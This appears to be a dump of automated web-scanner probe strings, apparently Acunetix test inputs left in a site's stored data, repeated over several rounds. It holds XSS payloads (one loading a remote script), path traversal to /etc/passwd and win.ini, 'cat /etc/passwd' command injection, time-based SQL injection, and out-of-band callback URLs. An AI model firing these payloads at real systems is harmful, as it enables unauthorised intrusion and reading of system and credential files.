..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(977984)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(953116)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971812></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(990295)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(962921)">

1

1

WEB-INF/web.xml

1

1

response.write(9572296*9598400)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983521)"></g></svg>

WEB-INF\web.xml

1

1

1

1

'+response.write(9572296*9598400)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<div style=width:expression(prompt(958877))>

../../../../../../../../../../etc/passwd

1

"+response.write(9572296*9598400)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<body onload=prompt(918586)>

1

"&cat /etc/passwd&"

1

1

${99982+99061}

../../../../../../../../../../etc/passwd.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932879)>

1

cat /etc/passwd

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(956932)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

1

1&n999672=v997892

-1))

1<img/src=">" onerror=alert(963391)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

)

1

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(937762)</sCripT>

FlbL2suP'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

m8odiv65')

'"()

1&lt

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

GNqMjvx1'))

1

'

"|"ld

\xf6<img acu onmouseover=prompt(988715) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

1

1

-1

"

1<input autofocus onfocus=prompt(949038)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

'

http://hitiPBhsZT4nZ.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

oRqQFiRi'

1

||cat /etc/passwd

1_TSIu9 <ScRiPt >prompt(939849)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

6iIcn9bl')

comments

1

'"

file:///etc/passwd

&dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(921446)</ScRiPt>

dUyywl2l'))

comments/.

<!--

'&dir&'

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(921159)</ScRiPt>

TERUPXji'))

1

1

"&dir&"

1

1_953422

1

WEB-INF\web.xml

1

1

1

1

|dir

acu9557\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9557

../../../../../../../../../../windows/win.ini

1

1

1

1

'|dir

../../../../../../../../../../boot.ini

acux5357\xc0\xbez1\xc0\xbcz2a\x90bcxuca5357

1

1

"|dir

1

1<ScRiPt >prompt(968896)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(936093)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(918226)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911842></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(924825)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(977852)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986712)"></g></svg>

1

1

1

1<div style=width:expression(prompt(922355))>

response.write(9266957*9002796)

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

1

'+response.write(9266957*9002796)+'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(935016)>

&cat /etc/passwd&

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"+response.write(9266957*9002796)+"

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959072)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(914916)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(933444)>

1

cat /etc/passwd

${100347+100073}

1

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(948269)</sCripT>

1

`cat /etc/passwd`

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1&n913448=v935488

1&lt

1

1

1

yiq13qzf'

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1

\xf6<img acu onmouseover=prompt(965042) //\xf6>

1

1

njqrLbAd')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

!(()&&!|*|*|

"|"ld

1<input autofocus onfocus=prompt(995612)>

1

1

h2Yg6Wor'))

testasp.vulnweb.com

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

"

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_cd640 <ScRiPt >prompt(935403)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

"

1

1

-1))

1

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://hitOW9IRGXZVj.bxss.me/

1

kle4ctsH'

1

comments

1

1

&dir

1

1

H4dri37L')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

file:///etc/passwd

'&dir&'

1

http://www.acunetix.tst

zU4yB3HJ'))

1

1

'"

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(956935)</ScRiPt>

1

1

1

<!--

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(959799)</ScRiPt>

1

1

1

1

1

1

1

WEB-INF\web.xml

'|dir

1_953844

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu1157\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1157

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux8583\xc0\xbez1\xc0\xbcz2a\x90bcxuca8583

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(980453)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<script>prompt(937101)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(981563)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986611></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(969211)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9124442*9470198)

1

1

1<video><source onerror="javascript:prompt(923439)">

1

1

WEB-INF/web.xml

'+response.write(9124442*9470198)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(956265)"></g></svg>

"+response.write(9124442*9470198)+"

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1<div style=width:expression(prompt(976827))>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(938086)>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(923529)>

${100019+99243}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1

1

1<img src=xyz OnErRor=prompt(930845)>

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n920733=v992140

-1))

1

1<img/src=">" onerror=alert(900642)>

)

PWyuCv4L'

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<ScRiPt%20>prompt(980678)</sCripT>

!(()&&!|*|*|

cs3UbMfB')

'"()

"|"ld

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

^(#$!@#$)(()))******

1

nC2QLMwi'))

1

1

1

/etc/passwd

'

1

\xf6<img acu onmouseover=prompt(915752) //\xf6>

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1<input autofocus onfocus=prompt(946613)>

1

-1)

1

"

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

-1))

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

http://hitsz1nNxUBFX.bxss.me/

QYANWB8j'

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

comments

1

&dir

1

R2fr6xsV')

1

1

1_EhnWj <ScRiPt >prompt(951687)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

file:///etc/passwd

http://www.acunetix.tst

IbxxtALt'))

'"

1

1

1

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

<!--

1

1

1'"()&%<ScRiPt >prompt(995352)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1

1

1

1

'"()&%<ScRiPt >prompt(969285)</ScRiPt>

WEB-INF\web.xml

'|dir

1

1

1

1

"|dir

1_979989

../../../../../../../../../../windows/win.ini

1

1

1

acu9559\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9559

1

../../../../../../../../../../boot.ini

1

1

acux7497\xc0\xbez1\xc0\xbcz2a\x90bcxuca7497

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(974984)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(939917)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(927242)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989840></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(959062)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(989535)">

1

1

WEB-INF/web.xml

response.write(9369777*9101843)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911405)"></g></svg>

WEB-INF\web.xml

&cat /etc/passwd&

1

'+response.write(9369777*9101843)+'

1

1

1<div style=width:expression(prompt(920029))>

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"+response.write(9369777*9101843)+"

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(903144)>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

-1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983889)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

-1)

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(943007)>

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

-1))

1

${100089+99411}

1

1

1<img/src=">" onerror=alert(918541)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

8C1IK3jd'

'|'ld

1

1

1

1<ScRiPt%20>prompt(916473)</sCripT>

1&n974153=v977800

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

ckiSnDwO')

"|"ld

1

)

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

554hqa4D'))

1

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(939300) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

'

1

'"()

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(912568)>

'

1

1

/etc/passwd

1

-1)

"

1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

||cat /etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitEEmcULhZWo.bxss.me/

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

5RbwbewP'

1

1

1

comments

1_wBkRt <ScRiPt >prompt(936001)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

z6P7jZsP')

1

1

1

1

comments

"&dir&"

71CoRSLR'))

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

|dir

1

1

comments/.

1

1

1

1

'"

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

1'"()&%<ScRiPt >prompt(984042)</ScRiPt>

<!--

1

1

WEB-INF/web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(986745)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

1_947075

1

1

../../../../../../../../../../windows/win.ini

acu7333\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7333

1

1

1

1

../../../../../../../../../../boot.ini

acux4160\xc0\xbez1\xc0\xbcz2a\x90bcxuca4160

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(942797)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(904051)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(913009)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915686></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(966976)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(956772)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9493220*9132383)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(917935)"></g></svg>

1

1

'+response.write(9493220*9132383)+'

1

&cat /etc/passwd&

1<div style=width:expression(prompt(979663))>

1

1

"+response.write(9493220*9132383)+"

WEB-INF/web.xml

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(990787)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946020)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1<img src=xyz OnErRor=prompt(905295)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

${100258+99134}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1<img/src=">" onerror=alert(921741)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1&n963905=v928507

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1<ScRiPt%20>prompt(963494)</sCripT>

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

Zz2BCbTR'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

7VFoRvu3')

\xf6<img acu onmouseover=prompt(989249) //\xf6>

'

^(#$!@#$)(()))******

testasp.vulnweb.com

/etc/passwd

1

1

1

1<input autofocus onfocus=prompt(930108)>

lZzbV8rd'))

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

-1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

http://hitqsDvRbdbbQ.bxss.me/

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

comments

1

1

-1))

1_AXbLV <ScRiPt >prompt(959057)</ScRiPt>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

comments

1

1

yfGqcomH'

1

http://www.acunetix.tst

file:///etc/passwd

1

1

1

'&dir&'

comments/.

diIdI38k')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"

1'"()&%<ScRiPt >prompt(974077)</ScRiPt>

1

"&dir&"

fOaLBK2a'))

WEB-INF/web.xml

1

1

1

<!--

'"()&%<ScRiPt >prompt(921181)</ScRiPt>

|dir

1

WEB-INF\web.xml

1

1

1

1

1_991108

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

"|dir

acu10543\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10543

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9465\xc0\xbez1\xc0\xbcz2a\x90bcxuca9465

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(957126)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<script>prompt(925233)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(947537)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978810></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(975598)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(942939)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925209)"></g></svg>

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(921200))>

response.write(9170095*9863712)

1

1

WEB-INF\web.xml

'+response.write(9170095*9863712)+'

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9170095*9863712)+"

'&cat /etc/passwd&'

1<body onload=prompt(971699)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968585)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(906446)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

-1

1

1

1<img/src=">" onerror=alert(930594)>

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

${100344+100327}

-1)

1

1

1<ScRiPt%20>prompt(964233)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1&n951578=v959150

-1))

1

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

JlBmQJaP'

)

1

1

\xf6<img acu onmouseover=prompt(922600) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GFs7MLUp')

!(()&&!|*|*|

1<input autofocus onfocus=prompt(960522)>

1

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

pp5txk6h'))

^(#$!@#$)(()))******

1

'

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

"

1

1

1

1

"

1_EpaL5 <ScRiPt >prompt(953873)</ScRiPt>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hitszhO6iv2Yz.bxss.me/

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

h2HKDcxm'

1

1

&dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

wzD7UUO5')

http://www.acunetix.tst

'&dir&'

comments

1

file:///etc/passwd

1

1

1

"&dir&"

'"

MpxRagvE'))

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(953891)</ScRiPt>

|dir

<!--

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(981325)</ScRiPt>

1

'|dir

1

1

1

1

WEB-INF\web.xml

1_948111

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

acu6589\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6589

1

1

1

../../../../../../../../../../boot.ini

1

1

acux1174\xc0\xbez1\xc0\xbcz2a\x90bcxuca1174

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(919551)</ScRiPt>

